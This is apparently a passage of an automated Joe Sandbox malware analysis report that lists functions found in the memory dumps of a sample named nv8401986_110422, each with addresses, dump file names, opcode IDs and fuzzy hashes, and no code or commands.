                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClassCursorHandleInitializeLoadModuleRegister
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2545979264-0
                                                                                                                                                                                                          • Opcode ID: 6f1de584a0442eb931bc5fd94114eb8930ee64fad1af7d8ddd016493829eaab7
                                                                                                                                                                                                          • Instruction ID: 987412843863b279937be66f5a409af9068820eff1730741965c17c19396f41b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f1de584a0442eb931bc5fd94114eb8930ee64fad1af7d8ddd016493829eaab7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFF027327002286EDF1076E89C09B9B7A849F20791F048033FE88D92A0C979C954C7D8
                                                                                                                                                                                                          Function 0B9CB550 Relevance: .8, Instructions: 778COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 8274e8c591281b398ec6d186a58511239557e5231fe303ded7ce58fe4e520c1e
                                                                                                                                                                                                          • Instruction ID: 1a9e480666f562c253df747b3c6cae20b4814e74e5eebd0ad0207e9e72b0294b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8274e8c591281b398ec6d186a58511239557e5231fe303ded7ce58fe4e520c1e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B162BC70A40204DBDB24CF94CA45BABBBF5EF85754F11854DE919AB282C771AC41CFA3
                                                                                                                                                                                                          Function 0B9C6141 Relevance: .6, Instructions: 607COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 685fa46a66f5f6872f11340b53faf5f951da0e6768a73738b97467401234fecc
                                                                                                                                                                                                          • Instruction ID: b9a640f09803ffe75729143104be4310e6265158efbbd87473c7712d695083ff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 685fa46a66f5f6872f11340b53faf5f951da0e6768a73738b97467401234fecc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C32DF30E403059BDB248F94CA80BABB7B9EF89710F11945ED915AB292D775E841CBA3
                                                                                                                                                                                                          Function 0CF04000 Relevance: .5, Instructions: 530COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3298606801.000000000CF00000.00000010.00000800.00020000.00000000.sdmp, Offset: 0CF00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_cf00000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: de8bbb5fcbed417c4ac615396b0a474b58737ab42e44c16a5f810ea5315af8cd
                                                                                                                                                                                                          • Instruction ID: bf81fdb144666ea51482b0ff9b92bc8c833eb095c96ff0248043f1ea6b732ec9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: de8bbb5fcbed417c4ac615396b0a474b58737ab42e44c16a5f810ea5315af8cd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E312D330B002059FDB24CF45C984BBABBE2EF85B14F258259EA05AB3D1D770ED41DB92
                                                                                                                                                                                                          Function 0EC86800 Relevance: .5, Instructions: 493COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3304984035.000000000EC80000.00000010.00000800.00020000.00000000.sdmp, Offset: 0EC80000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_ec80000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e8ddb913ca03903adcc98d080926a04d83a0c6dcf0a44d3983f5a6294ce3e398
                                                                                                                                                                                                          • Instruction ID: cbde9ad9e7deaa6e4303fc0f7f516719b47801dfd5879f16f1054c8d74acd7f6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8ddb913ca03903adcc98d080926a04d83a0c6dcf0a44d3983f5a6294ce3e398
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50021570B003009FEB24EF55CB95FAAB7E5EB44718F104529E946AB386CBB5ED40CB61
                                                                                                                                                                                                          Function 0BEF4C7E Relevance: .4, Instructions: 409COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3291206257.000000000BEF1000.00000010.00000800.00020000.00000000.sdmp, Offset: 0BEF1000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bef1000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: adc3dc8cd6b23a45495fa39982c1606cb3510af4bcd8d9b5417f563d52e6924c
                                                                                                                                                                                                          • Instruction ID: 2752f285f1ae2fd1bce514052252ad80bc09cb0a764d4025d1cd23013fd732fd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: adc3dc8cd6b23a45495fa39982c1606cb3510af4bcd8d9b5417f563d52e6924c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38F1FB31E042429FEB24CFA4C980BAEBBB2BF84704F15A159D7556B3C6DB74E881CB51
                                                                                                                                                                                                          Function 0B9C2302 Relevance: .4, Instructions: 360COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f34dae97d294e92ab4a6d9945cc99468806c025bda60fae47e3ec7ab29e15a44
                                                                                                                                                                                                          • Instruction ID: 0f631a0fdcef789f42aeefd8f9a83454a55cb4dca072290973697cc6598ef6c9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f34dae97d294e92ab4a6d9945cc99468806c025bda60fae47e3ec7ab29e15a44
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE417D70E042098FDB18CF44C5517AABBE5FF89364F10815EE954AB391D770E942CFA6
                                                                                                                                                                                                          Function 0CF03FB2 Relevance: .4, Instructions: 355COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3298606801.000000000CF00000.00000010.00000800.00020000.00000000.sdmp, Offset: 0CF00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_cf00000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0ed9b5a8c1aaa69a3a1991b863968c81169068eb8f65aa96d54eef79c4352393
                                                                                                                                                                                                          • Instruction ID: 36f6a47e391b26f25d9d55d9f810c12ed152d60793cd97f09b95d20356f63e1a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ed9b5a8c1aaa69a3a1991b863968c81169068eb8f65aa96d54eef79c4352393
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4E16B74B002098FDB14CF49C590BAABBF2FF89714F258299DA459B391D731EC42DB92
                                                                                                                                                                                                          Function 0EC867F8 Relevance: .4, Instructions: 354COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3304984035.000000000EC80000.00000010.00000800.00020000.00000000.sdmp, Offset: 0EC80000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_ec80000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e9d4e93ca0467bbd7342a14114d79df49c3b9cb7171dfb163bc12883bf7063c7
                                                                                                                                                                                                          • Instruction ID: 243513a85b41a9ba2ece98a017d872a9870afb9bed1e47cf5262006bd3d39aaa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9d4e93ca0467bbd7342a14114d79df49c3b9cb7171dfb163bc12883bf7063c7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12C12570B003009FEB24DF58CB95BAAB7E5EB88718F10452DE955AB385CBB6ED41CB50
                                                                                                                                                                                                          Function 0CF03FF2 Relevance: .4, Instructions: 352COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3298606801.000000000CF00000.00000010.00000800.00020000.00000000.sdmp, Offset: 0CF00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_cf00000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3866dd0fda45680ff6530f293dc985c661a1bf0029b0177937ed603b474a5840
                                                                                                                                                                                                          • Instruction ID: 7546c2b6eb6de4f43909be372a033cad5a7258af7213537804bd1236d5b59628
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3866dd0fda45680ff6530f293dc985c661a1bf0029b0177937ed603b474a5840
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DE15A74B002098FDB14CF49C590BAABBF2FF89714F258259DA459B3A1D731EC42DB92
                                                                                                                                                                                                          Function 0B9C22B0 Relevance: .3, Instructions: 323COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: eb6a39733559e59e5cf4981e24d6c3c9b289bbfa9396b69b60a055c4c91b8de1
                                                                                                                                                                                                          • Instruction ID: db59719aa62257e4eb1157f4b5e7df314de2f72a774343e6cf80bfc240273ebc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb6a39733559e59e5cf4981e24d6c3c9b289bbfa9396b69b60a055c4c91b8de1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC419170E042098FDB18CF44C5517AABBE5FF49364F14815DD918AB392D770D942CFA6
                                                                                                                                                                                                          Function 0ACD30C7 Relevance: .3, Instructions: 319COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3284841493.000000000ACD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0ACD0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_acd0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 43347ccadd2d6d8c84ba0877b313a53e5dfa2b8eaf4714b14dc8462365e37232
                                                                                                                                                                                                          • Instruction ID: fadd45a646dd419ab657a65f8b487806b514135ca535f8d051d4b7a9bcb6a656
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43347ccadd2d6d8c84ba0877b313a53e5dfa2b8eaf4714b14dc8462365e37232
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45C1D074A04354AFEB20CF04CA45B6AB7A0FB44324F168559EA557F391CBB8ED81CF92
                                                                                                                                                                                                          Function 0CF041DE Relevance: .3, Instructions: 314COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3298606801.000000000CF00000.00000010.00000800.00020000.00000000.sdmp, Offset: 0CF00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_cf00000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a3ca76cdb65df35fd65b36e930a2efd10e64e711f6f96da663bd342e4f5b0605
                                                                                                                                                                                                          • Instruction ID: 74b8dc83f8d2e0f1ce60f591c45dae3d0320a7110fb533972e2d06939a8619aa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3ca76cdb65df35fd65b36e930a2efd10e64e711f6f96da663bd342e4f5b0605
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42D13974B002098FEB14CF49C590B6ABBF2FF89714F258299DA459B395D731EC42DB82
                                                                                                                                                                                                          Function 0B9C7006 Relevance: .3, Instructions: 275COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e3895a6d40277a6e437d5226bcb1dd7b85676802bb83f0b5e68863b1ef36ea1f
                                                                                                                                                                                                          • Instruction ID: e7a040b494c11d222c3e74d0b54e3ec2703cd4cfba30f12f4640434376b5ca09
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3895a6d40277a6e437d5226bcb1dd7b85676802bb83f0b5e68863b1ef36ea1f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4A11330A042419FD724CF94C981B6BBBE6EF85714F14815DEA156B2D2CB79AC81CFA3
                                                                                                                                                                                                          Function 0B9C004C Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 6d917e82e885a536b4d050adf88ef641d6bbec08121841fdbe22eb2515958eae
                                                                                                                                                                                                          • Instruction ID: c885fbc61332e79682b822bb4d9ae852073a61b1cc790829a9361275d0e661af
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d917e82e885a536b4d050adf88ef641d6bbec08121841fdbe22eb2515958eae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EAA12370A40300DFE724CF54C985BABBBE6EB85714F15854EE505A73C2CBB5AC80CB62
                                                                                                                                                                                                          Function 0C90154B Relevance: .2, Instructions: 235COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3294499264.000000000C900000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C900000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c900000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0c903441a5d6847e9897fa094462c89fea5e90ba4d1c822af483930c24b4e1d1
                                                                                                                                                                                                          • Instruction ID: 6767b94e2cdb7f3a6a8327adacd6a61468bea004de6c05569bc8578531d5a6b4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c903441a5d6847e9897fa094462c89fea5e90ba4d1c822af483930c24b4e1d1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27811231B04240DFEB288B95C944BBEB7EAEF81305F39855AE406972D1CB75EC81CB61
                                                                                                                                                                                                          Function 0B9C618A Relevance: .2, Instructions: 215COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a27cd772fe69b26fe26eda907a2ba802597fd1fa760f716c2cb1121d94ff0784
                                                                                                                                                                                                          • Instruction ID: 5485afc50bb481a4624de3a98fc93c6e689762966a2e3253693d67ed73551d12
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a27cd772fe69b26fe26eda907a2ba802597fd1fa760f716c2cb1121d94ff0784
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD81BE31E042018FCB24CF58C590AAAB7F5FF89710F1A955ED919AB352D771EC81CB92
                                                                                                                                                                                                          Function 0C91C459 Relevance: .2, Instructions: 191COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3294559654.000000000C91A000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C91A000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c91a000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e629e58f55f3bb6da79177993fab1adb6476e5b2d44ce6d9e0cbb3578deef77c
                                                                                                                                                                                                          • Instruction ID: 4c9d072366d69ebd06f3f3502770f134c817d91aa9aec270d8aa2eb3b7a0d60e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e629e58f55f3bb6da79177993fab1adb6476e5b2d44ce6d9e0cbb3578deef77c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3071E070780219AFC720CF0AC592A76BBE6FF45764B15954AEC466B381C771FC81CBA1
                                                                                                                                                                                                          Function 0ACD1A0B Relevance: .2, Instructions: 187COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3284841493.000000000ACD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0ACD0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_acd0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ba90212a655ec5c76a95d2b37b5c1666a90afede4b01e7c12ae0ed3a4c843973
                                                                                                                                                                                                          • Instruction ID: a10a9c62da591904fed3052af60a95195029314f66dde9321fd56f3430d060b3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba90212a655ec5c76a95d2b37b5c1666a90afede4b01e7c12ae0ed3a4c843973
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE5169B1604304AFDB24CF58C941BA9B7E4EF44320F1A0A89FA49DB3A1E774DD41CB52
                                                                                                                                                                                                          Function 0B9C6283 Relevance: .2, Instructions: 185COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 81827e60a640b9fa513ec368db69f7ade4019944fcc3e8d4027223cd8209cfa3
                                                                                                                                                                                                          • Instruction ID: 657217df75c21536514e41d340ab239ee295aac618cf8e51f5fe2cac0d323c67
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81827e60a640b9fa513ec368db69f7ade4019944fcc3e8d4027223cd8209cfa3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E719F31E042058FCB24CF48C590AAAB7F6FF89310F29855ED815AB352D771EC81CB92
                                                                                                                                                                                                          Function 0B9C7921 Relevance: .2, Instructions: 179COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ec504252b52a0ccc54ae9ab43c1970c234f74cbb47a702dbc5a0b19f59223a08
                                                                                                                                                                                                          • Instruction ID: 023485b7e37535b8f677cbc53eb1bb7e9da2e84859c3c40af6829785b51d302c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec504252b52a0ccc54ae9ab43c1970c234f74cbb47a702dbc5a0b19f59223a08
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7512B70E413019BEB305AE4CA85BABB79CEF44644F15145EE906A7382DB78AD818F73
                                                                                                                                                                                                          Function 0D7EF800 Relevance: .2, Instructions: 166COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3301515219.000000000D7E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0D7E0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_d7e0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0c18e8382b56bac31d45af90fa96777bd6c9c07f2af543a12105d6b1249094ba
                                                                                                                                                                                                          • Instruction ID: 54534c9f09b4425351900be7b021696217e71aa6b08bc8cb750c9c507ba73761
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c18e8382b56bac31d45af90fa96777bd6c9c07f2af543a12105d6b1249094ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D513231A442009FD724CF48C840BBAF3A9FF8A374F11815ED9699BB81CB70E941CB92
                                                                                                                                                                                                          Function 0B9C2400 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 596120e80950320db801b94056d482b7038136bf96931d30c9d5b54d6ae34bf0
                                                                                                                                                                                                          • Instruction ID: 1278537cc3b37d41b6cc8010d9a36bf930e698060edda0a900b09a68b2167a5e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 596120e80950320db801b94056d482b7038136bf96931d30c9d5b54d6ae34bf0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC51E170A042058FDB28CF54C954BAABBE5EB45324F10815EE515AB381DB74ED41CFA3
                                                                                                                                                                                                          Function 0BF07C04 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3291235020.000000000BF01000.00000010.00000800.00020000.00000000.sdmp, Offset: 0BF01000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bf01000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2c795ef340e705be34417198efb4784cac360c729acd29159f153e75162a3829
                                                                                                                                                                                                          • Instruction ID: 0f8f8ffe541f230b3b5e002f86ae57b077f67857c029afd77a91fa76e75c7c8a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c795ef340e705be34417198efb4784cac360c729acd29159f153e75162a3829
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2741CE33E662016FDB21AA108D91FBE7396EF82210F15809AE511A72E1DF70FC41D3B1
                                                                                                                                                                                                          Function 0EC810AD Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3304984035.000000000EC80000.00000010.00000800.00020000.00000000.sdmp, Offset: 0EC80000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_ec80000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3bb0ffab4721b8af039f7c080d0405dd2b4e72252dab8e04e3d91344fc13108f
